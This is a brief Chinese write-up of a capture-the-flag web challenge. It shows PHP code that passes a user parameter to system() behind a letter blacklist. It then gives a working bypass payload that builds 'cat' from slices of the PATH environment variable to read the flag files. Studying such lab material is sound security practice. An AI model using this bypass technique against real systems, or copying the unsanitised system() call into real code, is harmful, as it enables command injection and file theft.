polarweb-狗黑子的变量

狗黑子的变量
给出了一堆代码
`<?php
error_reporting(0);
highlight_file(FILE);

$gou = $GET["gou"];
$gou = str_replace(['~', '^', ''], '', $gou);
$hei = array('Q', 'W', 'E', 'R', 'Y', 'U', 'I', 'O', 'S', 'D', 'F', 'G', 'J', 'K', 'L', 'Z', 'X', 'C', 'V', 'B', 'N', 'M', 'q', 'w', 'e', 'r', 'y', 'u', 'i', 'o', 's', 'd', 'f', 'g', 'j', 'k', 'l', 'z', 'x', 'c', 'v', 'b', 'n', 'm');

$heizi = str_ireplace($hei, '', $gou);
if ($heizi !== $gou) {
die("heizi");
}

system($gou);
?>`
发现过滤很多很多字母，只有ahpt可以用，扫描目录后发现admin.php
发现可以查看系统环境变量PATH的内容，有了这个之后就可以利用PATH进行拼接执行命令


命令执行成功
?gou=${PATH:7:1}at%20../*得到flag